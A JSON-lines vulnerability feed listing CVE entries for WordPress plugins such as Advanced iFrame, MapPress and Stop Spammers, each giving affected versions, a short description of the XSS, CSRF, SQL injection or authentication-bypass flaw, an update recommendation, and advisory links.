{"CVE_ID":"CVE-2025-1439","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ac1145b-5ab1-47a9-9117-4870c52a70fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ac1145b-5ab1-47a9-9117-4870c52a70fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1437","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/676b4768-98ea-4e55-87de-ef7ae1d7a113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/676b4768-98ea-4e55-87de-ef7ae1d7a113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5002","slug":"user-submitted-posts","versionImpact":"20240319","versionEndExcluding":"20240516","description":"The User Submitted Posts WordPress plugin before 20240516 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 20240516, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da09b99a-fa40-428f-80b4-0af764fd2f4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da09b99a-fa40-428f-80b4-0af764fd2f4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4144","slug":"simple-basic-contact-form","versionImpact":"20240502","versionEndExcluding":"20240511","description":"The Simple Basic Contact Form plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 20240502. This allows unauthenticated attackers to execute arbitrary shortcodes. The severity and exploitability depends on the functionality of other plugins installed in the environment.","recommendation":"Update to version 20240511, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded1944f-662d-4d25-8277-4b1dc63b2144?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded1944f-662d-4d25-8277-4b1dc63b2144?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085036\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085036\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4150","slug":"simple-basic-contact-form","versionImpact":"20221201","versionEndExcluding":"20240502","description":"The Simple Basic Contact Form plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018scf_email\u2019 parameter in versions up to, and including, 20221201 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 20240502, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-basic-contact-form\\\/trunk\\\/simple-basic-contact-form.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22074d7a-5dbd-4a0c-bc5d-e4c983e5edb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22074d7a-5dbd-4a0c-bc5d-e4c983e5edb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2470","slug":"simple-ajax-chat","versionImpact":"20240318","versionEndExcluding":"20240412","description":"The Simple Ajax Chat WordPress plugin before 20240412 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 20240412, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8514b8ce-ff23-4aba-b2f1-fd36beb7d2ff\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8514b8ce-ff23-4aba-b2f1-fd36beb7d2ff\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0431","slug":"gestpay-for-woocommerce","versionImpact":"20221130","versionEndExcluding":"20240307","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_set_default_card' function. This makes it possible for unauthenticated attackers to set the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 20240307, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestpay-for-woocommerce\\\/trunk\\\/inc\\\/class-gestpay-cards.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestpay-for-woocommerce\\\/trunk\\\/inc\\\/class-gestpay-cards.php#L117\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1983","slug":"simple-ajax-chat","versionImpact":"20240216","versionEndExcluding":"20240223","description":"The Simple Ajax Chat WordPress plugin before 20240223 does not prevent visitors from using malicious names when using the chat, which will be reflected unsanitized to other users.","recommendation":"Update to version 20240223, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3a31de-a227-4db1-bd18-ce6a78dc96fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3a31de-a227-4db1-bd18-ce6a78dc96fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7065","slug":"stop-spammer-registrations-plugin","versionImpact":"2024.4","versionEndExcluding":"2024.5","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2024.4. This is due to missing or incorrect nonce validation on the sfs_process AJAX action. This makes it possible for unauthenticated attackers to add arbitrary IPs to the plugin's allowlist and blocklist via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2024.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1998cadb-2eb3-4819-aa7c-59e4f777c7f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1998cadb-2eb3-4819-aa7c-59e4f777c7f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080581%40stop-spammer-registrations-plugin&new=3080581%40stop-spammer-registrations-plugin&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080581%40stop-spammer-registrations-plugin&new=3080581%40stop-spammer-registrations-plugin&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4365","slug":"advanced-iframe","versionImpact":"2024.3","versionEndExcluding":"2024.4","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018add_iframe_url_as_param_direct\u2019 parameter in versions up to, and including, 2024.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2024.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21990e54-c3a2-4bca-b164-132ad456e651?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21990e54-c3a2-4bca-b164-132ad456e651?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-after-iframe.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-after-iframe.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090438\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090438\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8621","slug":"daily-prayer-time-for-mosques","versionImpact":"2024.08.26","versionEndExcluding":"2024.09.14","description":"The Daily Prayer Time plugin for WordPress is vulnerable to SQL Injection via the 'max_word' attribute of the 'quran_verse' shortcode in all versions up to, and including, 2024.08.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2024.09.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/866e4bc3-080a-4498-b210-e692d72d3db0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/866e4bc3-080a-4498-b210-e692d72d3db0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/daily-prayer-time-for-mosques\\\/tags\\\/2024.08.26\\\/Models\\\/QuranADay\\\/QuranDB.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/daily-prayer-time-for-mosques\\\/tags\\\/2024.08.26\\\/Models\\\/QuranADay\\\/QuranDB.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151906\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151906\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2872","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape some of its settings, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15d3150c-673c-4c36-ac5e-85767d78b9eb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15d3150c-673c-4c36-ac5e-85767d78b9eb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2696","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6e64af0-adeb-4e28-9a81-f4024b0446ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6e64af0-adeb-4e28-9a81-f4024b0446ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2870","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/688522d2-ee28-44f8-828d-352f06e43885\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/688522d2-ee28-44f8-828d-352f06e43885\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2430","slug":"show-website-content-in-wordpress-page-or-post","versionImpact":"2024.03.27","versionEndExcluding":"2024.04.09","description":"The Website Content in Page or Post WordPress plugin before 2024.04.09 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2024.04.09, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/990b7d7a-3d7a-46d5-9aeb-740de817e2d9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/990b7d7a-3d7a-46d5-9aeb-740de817e2d9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2697","slug":"socialdriver-framework","versionEndExcluding":"2024.0.0","description":"The socialdriver-framework WordPress plugin before 2024.0.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","recommendation":"Update to version 2024.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c430b30d-61db-45f5-8499-91b491503b9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c430b30d-61db-45f5-8499-91b491503b9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7069","slug":"advanced-iframe","versionImpact":"2023.10","versionEndExcluding":"2024.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2023.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2024.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4826","slug":"socialdriver","versionEndExcluding":"2024","description":"The SocialDriver WordPress theme before version 2024 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties resulting in a cross-site scripting (XSS) attack.","recommendation":"Update to version 2024, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99ec0add-8f4d-4d68-91aa-80b1631a53bf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99ec0add-8f4d-4d68-91aa-80b1631a53bf\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/socialdriver.com\",\"name\":\"http:\\\/\\\/socialdriver.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4775","slug":"advanced-iframe","versionImpact":"2023.8","versionEndExcluding":"2023.9","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'advanced_iframe' shortcode in versions up to, and including, 2023.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2023.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9944443-2e71-45c4-8a19-d76863cf66df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9944443-2e71-45c4-8a19-d76863cf66df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2993602\\\/advanced-iframe\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2993602\\\/advanced-iframe\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2489","slug":"stop-spammer-registrations-plugin","versionEndExcluding":"2023","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2023, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcbe3334-357a-4744-b50c-309d10cca30d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcbe3334-357a-4744-b50c-309d10cca30d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2488","slug":"stop-spammer-registrations-plugin","versionEndExcluding":"2023","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape various parameters before outputting them back in admin dashboard pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2023, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60226669-0b7b-441f-93d4-b5933e69478f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60226669-0b7b-441f-93d4-b5933e69478f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11087","slug":"miniorange-login-openid","versionImpact":"200.3.9","versionEndExcluding":"200.3.10","description":"The miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 200.3.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 200.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.miniorange.com\\\/\",\"name\":\"https:\\\/\\\/www.miniorange.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f677b257-606a-45f2-ba85-3a56b8df2a3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f677b257-606a-45f2-ba85-3a56b8df2a3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7313","slug":"wp-simple-firewall","versionImpact":"20.0.5","versionEndExcluding":"20.0.6","description":"The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 20.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83a1bdc6-098e-43d5-89e5-f4202ecd78a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83a1bdc6-098e-43d5-89e5-f4202ecd78a1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0251","slug":"advanced-woo-search","versionImpact":"2.96","versionEndExcluding":"2.97","description":"The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.","recommendation":"Update to version 2.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L2170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L2170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.97\\\/includes\\\/class-aws-integrations.php#L2104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.97\\\/includes\\\/class-aws-integrations.php#L2104\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2055","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.8","versionEndExcluding":"2.94.9","description":"The MapPress Maps for WordPress plugin before 2.94.9 does not sanitise and escape some parameters when outputting them in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.94.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8bfdbbf-6963-4fab-826a-6be770ac72c3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8bfdbbf-6963-4fab-826a-6be770ac72c3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10715","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.1","versionEndExcluding":"2.94.2","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Map block in all versions up to, and including, 2.94.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.94.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d966924-aeab-4397-9555-78291af70efe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d966924-aeab-4397-9555-78291af70efe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180900\\\/mappress-google-maps-for-wordpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180900\\\/mappress-google-maps-for-wordpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2162","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.9","versionEndExcluding":"2.94.10","description":"The MapPress Maps for WordPress plugin before 2.94.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.94.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8620","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.92.2","versionEndExcluding":"2.93","description":"The MapPress Maps for WordPress plugin before 2.93 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b0ddd8-0380-4185-aa00-8437e2b617ad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b0ddd8-0380-4185-aa00-8437e2b617ad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
